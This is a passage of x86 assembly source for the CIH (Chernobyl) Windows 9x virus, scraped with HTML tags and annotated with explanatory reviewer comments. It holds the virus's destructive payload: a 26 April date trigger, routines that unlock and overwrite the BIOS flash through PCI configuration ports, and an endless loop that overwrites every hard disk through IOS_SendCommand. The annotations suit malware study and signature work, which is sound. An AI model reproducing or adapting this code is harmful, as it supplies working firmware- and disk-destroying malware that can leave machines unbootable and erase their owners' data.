call [ebx+20h+04h] ; Call pIFSFunc <br>
pop ecx ; </p>
<p>mov [ebx+1ch], eax ; Modify EAX Value in Stack </p>
<p>; *************************** <br>
; * After Calling pIFSFunc, * <br>
; * Get Some Data from the * <br>
; * Returned pioreq. * <br>
; *************************** </p>
<p>cmp dword ptr [ebx+20h+04h+04h], 00000024h <br>
jne QuitMyVirusFileSystemHook </p>
<p>; ***************** <br>
; * Get the File * <br>
; * Modification * <br>
; * Date and Time * <br>
; * in DOS Format.* <br>
; ***************** </p>
<p>mov eax, [ecx+28h] <br>
mov (FileModificationTime-@6)[esi], eax </p>
<p>; *************************** <br>
; * Quit My Virus' * <br>
; * IFSMgr_FileSystemHook * <br>
; *************************** </p>
<p>QuitMyVirusFileSystemHook: </p>
<p>popad </p>
<p>ret </p>
<p>; ************************************* <br>
; * Kill Computer !? ... *^_^* * <br>
; ************************************* </p>
<p>IsKillComputer: <br>
; Date trigger for the payload that follows. Two RTC/CMOS registers are read <br>
; through index port 70h and data port 71h and compared with 04h:26h. <br>
; On any other value control leaves via DisableOnBusy (defined outside this <br>
; excerpt), so the code below is not reached by fall-through. <br>
; Clobbers: ax, flags. <br>
; Read the current month from the RTC/CMOS: al = 08h selects the register, <br>
; ah = 07h is kept for the day read that follows. <br>
mov ax, 0708h <br>
out 70h, al <br>
in al, 71h </p>
<p>xchg ah, al </p>
<p>; Read the current day from the RTC/CMOS (al is now 07h, ah holds the month) <br>
out 70h, al <br>
in al, 71h </p>
<p>xor ax, 0426h ; 04/26/???? <br>
; ax is zero only when ah = 04h and al = 26h, which matches the 04/26 note <br>
; above if the RTC returns BCD digits. The year is never read. <br>
jne DisableOnBusy </p>
<p>; ************************************** <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; ************************************** </p>
<p>; *************************** <br>
; * Kill BIOS EEPROM * <br>
; *************************** </p>
<p>mov bp, 0cf8h <br>
; bp = 0CF8h, the port IOForEEPROM swaps into dx for its dword writes <br>
; (0CF8h is the PCI configuration-address port, 0CFCh-0CFFh its data window). <br>
; The lea assumes esi still points at @7 (FileNameBuffer) - set outside this excerpt. <br>
lea esi, IOForEEPROM-@7[esi] </p>
<p>; *********************** <br>
; * Show BIOS Page in * <br>
; * 000E0000 - 000EFFFF * <br>
; * ( 64 KB ) * <br>
; *********************** </p>
<p>mov edi, 8000384ch <br>
; edi = dword IOForEEPROM writes to port 0CF8h; dx = 0CFEh is the byte port it <br>
; reads, ORs with 44h and writes back. <br>
mov dx, 0cfeh <br>
cli <br>
; Interrupts stay disabled from here on: no sti appears in the visible code. <br>
call esi </p>
<p>; *********************** <br>
; * Show BIOS Page in * <br>
; * 000F0000 - 000FFFFF * <br>
; * ( 64 KB ) * <br>
; *********************** </p>
<p>mov di, 0058h <br>
; Only the low word of edi changes (now 80000058h); dec edx moves dx to 0CFDh. <br>
dec edx ; and al,0fh <br>
; Self-modifying code: the two bytes at BooleanCalculateCode inside IOForEEPROM <br>
; (originally "or al, 44h") become 24h 0Fh, the "and al,0fh" named in the note above. <br>
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h <br>
call esi </p>
<p>; *********************** <br>
; * Show the BIOS Extra * <br>
; * ROM Data in Memory * <br>
; * 000E0000 - 000E01FF * <br>
; * ( 512 Bytes ) * <br>
; * , and the Section * <br>
; * of Extra BIOS can * <br>
; * be Writted... * <br>
; *********************** </p>
<p>lea ebx, EnableEEPROMToWrite-@10[esi] </p>
<p>mov eax, 0e5555h <br>
mov ecx, 0e2aaah <br>
; EnableEEPROMToWrite stores cl (0AAh) and al (55h) at these two addresses. <br>
call ebx <br>
mov byte ptr [eax], 60h </p>
<p>push ecx <br>
; "loop $" decrements ecx to zero in place: a busy-wait of 0E2AAAh iterations. <br>
; The pushed ecx is popped again before the second EnableEEPROMToWrite call. <br>
loop $ </p>
<p>; *********************** <br>
; * Kill the BIOS Extra * <br>
; * ROM Data in Memory * <br>
; * 000E0000 - 000E007F * <br>
; * ( 80h Bytes ) * <br>
; *********************** </p>
<p>xor ah, ah <br>
; eax is now 000E0055h and al is 55h, so the store lands inside the range named above. <br>
mov [eax], al </p>
<p>xchg ecx, eax <br>
; ecx takes the address value as the next delay count; eax is left at 0. <br>
loop $ </p>
<p>; *********************** <br>
; * Show and Enable the * <br>
; * BIOS Main ROM Data * <br>
; * 000E0000 - 000FFFFF * <br>
; * ( 128 KB ) * <br>
; * can be Writted... * <br>
; *********************** </p>
<p>mov eax, 0f5555h <br>
pop ecx <br>
; ecx is back to 0E2AAAh; setting ch = 0AAh turns it into 0EAAAAh. <br>
mov ch, 0aah <br>
call ebx <br>
mov byte ptr [eax], 20h </p>
<p>loop $ </p>
<p>; *********************** <br>
; * Kill the BIOS Main * <br>
; * ROM Data in Memory * <br>
; * 000FE000 - 000FE07F * <br>
; * ( 80h Bytes ) * <br>
; *********************** </p>
<p>mov ah, 0e0h <br>
; eax = 000FE055h, al = 55h. <br>
mov [eax], al </p>
<p>; *********************** <br>
; * Hide BIOS Page in * <br>
; * 000F0000 - 000FFFFF * <br>
; * ( 64 KB ) * <br>
; *********************** <br>
; or al,10h <br>
; Second patch of BooleanCalculateCode: bytes 0Ch 10h. edi (80000058h) and <br>
; dx (0CFDh) are unchanged since the previous IOForEEPROM call. <br>
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch <br>
call esi </p>
<p>; *************************** <br>
; * Kill All HardDisk * <br>
; *************************************************** <br>
; * IOR Structure of IOS_SendCommand Needs * <br>
; *************************************************** <br>
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * <br>
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * <br>
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * <br>
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * <br>
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * <br>
; *************************************************** </p>
<p>KillHardDisk: <br>
; Builds a request block on the stack (layout sketched in the banner above) and <br>
; submits it through the IOS_SendCommand VxD service in a loop. <br>
; When reached by fall-through ecx is 0, because the last "loop $" ran it down. <br>
xor ebx, ebx <br>
mov bh, FirstKillHardDiskNumber <br>
push ebx <br>
sub esp, 2ch <br>
push 0c0001000h <br>
mov bh, 08h <br>
push ebx <br>
push ecx <br>
push ecx <br>
push ecx <br>
push 40000501h <br>
inc ecx <br>
push ecx <br>
push ecx </p>
<p>mov esi, esp <br>
; esi = base of the block just built; a further 0ACh bytes of stack are reserved below it. <br>
sub esp, 0ach </p>
<p>LoopOfKillHardDisk: <br>
; int 20h followed by an inline dword is the Windows 9x VxDCall form (a ring-0 <br>
; service call); the note on the dd line names the service. <br>
int 20h <br>
dd 00100004h ; VXDCall IOS_SendCommand </p>
<p>cmp word ptr [esi+06h], 0017h <br>
; NOTE(review): [esi+06h] looks like the status word returned in the block - confirm against the IOR definition. <br>
je KillNextDataSection </p>
<p>ChangeNextHardDisk: <br>
; Advances the byte at [esi+4dh], which was initialised from FirstKillHardDiskNumber. <br>
inc byte ptr [esi+4dh] </p>
<p>jmp LoopOfKillHardDisk </p>
<p>KillNextDataSection: <br>
; Adds ebx to the dword at [esi+10h] and resets [esi+4dh]; ebx was 0800h before <br>
; the loop (assumes IOS_SendCommand preserves it - TODO confirm). <br>
; Both branches jump back to LoopOfKillHardDisk: no exit from this loop is visible. <br>
add dword ptr [esi+10h], ebx <br>
mov byte ptr [esi+4dh], FirstKillHardDiskNumber </p>
<p>jmp LoopOfKillHardDisk </p>
<p>; *************************** <br>
; * Enable EEPROM to Write * <br>
; *************************** </p>
<p>EnableEEPROMToWrite: <br>
; In: eax, ecx = two target addresses; al and cl double as the data bytes. <br>
; Performs five byte stores in fixed order: cl to [eax], al to [ecx], 80h to [eax], <br>
; cl to [eax], al to [ecx]. No register is modified. <br>
; NOTE(review): this looks like a flash-device command prefix - confirm against the part's datasheet. <br>
mov [eax], cl <br>
mov [ecx], al <br>
mov byte ptr [eax], 80h <br>
mov [eax], cl <br>
mov [ecx], al </p>
<p>ret </p>
<p>; *************************** <br>
; * IO for EEPROM * <br>
; *************************** </p>
<p>IOForEEPROM: <br>
; In: edi = dword to write to the port held in bp; dx = byte port to read-modify-write. <br>
; The xchg pairs swap eax/edi and edx/ebp around each "out dx, eax", so the order is: <br>
; write edi to port bp, read al from port dx, modify al, write edi to port bp again, <br>
; write al to port dx. edi, edx and ebp are restored on return; al holds the modified byte. <br>
@10 = IOForEEPROM </p>
<p>xchg eax, edi <br>
xchg edx, ebp <br>
out dx, eax </p>
<p>xchg eax, edi <br>
xchg edx, ebp <br>
in al, dx </p>
<p>BooleanCalculateCode = $ <br>
; Patch point: callers overwrite this two-byte instruction before some calls, <br>
; so the operation applied to al is not always the "or" shown here. <br>
or al, 44h </p>
<p>xchg eax, edi <br>
xchg edx, ebp <br>
out dx, eax </p>
<p>xchg eax, edi <br>
xchg edx, ebp <br>
out dx, al </p>
<p>ret </p>
<p>; ********************************************************* <br>
; * Static Data * <br>
; ********************************************************* </p>
<p>LastVxDCallAddress = IFSMgr_Ring0_FileIO <br>
; VxDCallAddressTable: one byte per entry. After the leading 00h, each value is <br>
; the distance between two consecutive labels (all defined outside this excerpt). <br>
VxDCallAddressTable db 00h <br>
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate <br>
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook <br>
db IFSMgr_Ring0_FileIO-UniToBCSPath </p>
<p>VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h <br>
; NOTE(review): presumably the VxD service IDs for the four labels above, in the same order - confirm. <br>
; VxDCallTableSize is the number of dword entries in VxDCallIDTable (4). <br>
VxDCallTableSize = ($-VxDCallIDTable)/04h </p>
<p>; ********************************************************* <br>
; * Virus Version Copyright * <br>
; ********************************************************* </p>
<p>VirusVersionCopyright db 'CIH v' <br>
; Literal marker string of the form "CIH vX.Y TTIT" stored in the body; the two <br>
; digits come from MajorVirusVersion / MinorVirusVersion (defined outside this excerpt). <br>
; A fixed ASCII run like this is a usable anchor for a static signature. <br>
db MajorVirusVersion+'0' <br>
db '.' <br>
db MinorVirusVersion+'0' <br>
db ' TTIT' </p>
<p>; ********************************************************* <br>
; * Virus Size * <br>
; ********************************************************* </p>
<p>VirusSize = $ <br>
; VirusSize is the location counter at the end of the static data. The three <br>
; lines below are the author's commented-out list of further terms; they are <br>
; not part of the assembled expression. <br>
; + SizeOfVirusCodeSectionTableEndMark(04h) <br>
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) <br>
; + SizeOfTheFirstVirusCodeSectionTable(04h) </p>
<p>; ********************************************************* <br>
; * Dynamic Data * <br>
; ********************************************************* </p>
<p>VirusGameDataStartAddress = VirusSize <br>
; Uninitialised working area that starts at offset VirusSize. @6, @7, @8 and @9 <br>
; are base symbols for the (label-@N)[esi] addressing used by the code, <br>
; for example (FileModificationTime-@6)[esi]. <br>
@6 = VirusGameDataStartAddress <br>
OnBusy db 0 <br>
FileModificationTime dd ? </p>
<p>FileNameBuffer db FileNameBufferSize dup(?) <br>
@7 = FileNameBuffer </p>
<p>DataBuffer = $ <br>
; Field names and widths from here follow the PE file header and optional header, <br>
; starting at NumberOfSections. <br>
; NOTE(review): presumably filled from a host file's header - the read is outside this excerpt. <br>
@8 = DataBuffer <br>
NumberOfSections dw ? <br>
TimeDateStamp dd ? <br>
SymbolsPointer dd ? <br>
NumberOfSymbols dd ? <br>
SizeOfOptionalHeader dw ? <br>
_Characteristics dw ? <br>
Magic dw ? <br>
LinkerVersion dw ? <br>
SizeOfCode dd ? <br>
SizeOfInitializedData dd ? <br>
SizeOfUninitializedData dd ? <br>
AddressOfEntryPoint dd ? <br>
BaseOfCode dd ? <br>
BaseOfData dd ? <br>
ImageBase dd ? <br>
@9 = $ <br>
SectionAlignment dd ? <br>
FileAlignment dd ? <br>
OperatingSystemVersion dd ? <br>
ImageVersion dd ? <br>
SubsystemVersion dd ? <br>
Reserved dd ? <br>
SizeOfImage dd ? <br>
SizeOfHeaders dd ? <br>
; Byte count from NumberOfSections through SizeOfHeaders. <br>
SizeOfImageHeaderToRead = $-NumberOfSections </p>
<p>NewAddressOfEntryPoint = DataBuffer ; DWORD <br>
SizeOfImageHeaderToWrite = 04h </p>
<p>StartOfSectionTable = @9 <br>
; The equates below overlay the buffer from @9 (SectionAlignment) onward and follow <br>
; the layout of one PE section header; SizeOfScetionTable evaluates to 28h. <br>
; The misspelt names NumberOfLinenNmbers and SizeOfScetionTable are left as they <br>
; are because code outside this excerpt may reference them. <br>
SectionName = StartOfSectionTable ; QWORD <br>
VirtualSize = StartOfSectionTable+08h ; DWORD <br>
VirtualAddress = StartOfSectionTable+0ch ; DWORD <br>
SizeOfRawData = StartOfSectionTable+10h ; DWORD <br>
PointerToRawData = StartOfSectionTable+14h ; DWORD <br>
PointerToRelocations = StartOfSectionTable+18h ; DWORD <br>
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD <br>
NumberOfRelocations = StartOfSectionTable+20h ; WORD <br>
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD <br>
Characteristics = StartOfSectionTable+24h ; DWORD <br>
SizeOfScetionTable = Characteristics+04h-SectionName </p>
<p>; ********************************************************* <br>
; * Virus Total Need Memory * <br>
; ********************************************************* </p>
<p>VirusNeedBaseMemory = $ </p>
<p>VirusTotalNeedMemory = @9 <br>
; Assembles to the offset of @9 only. The four lines below are the author's <br>
; commented-out list of per-file terms and are not part of the expression. <br>
; + NumberOfSections(??)*SizeOfScetionTable(28h) <br>
; + SizeOfVirusCodeSectionTableEndMark(04h) <br>
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) <br>
; + SizeOfTheFirstVirusCodeSectionTable(04h) </p>
<p>; ********************************************************* <br>
; ********************************************************* <br>
</p>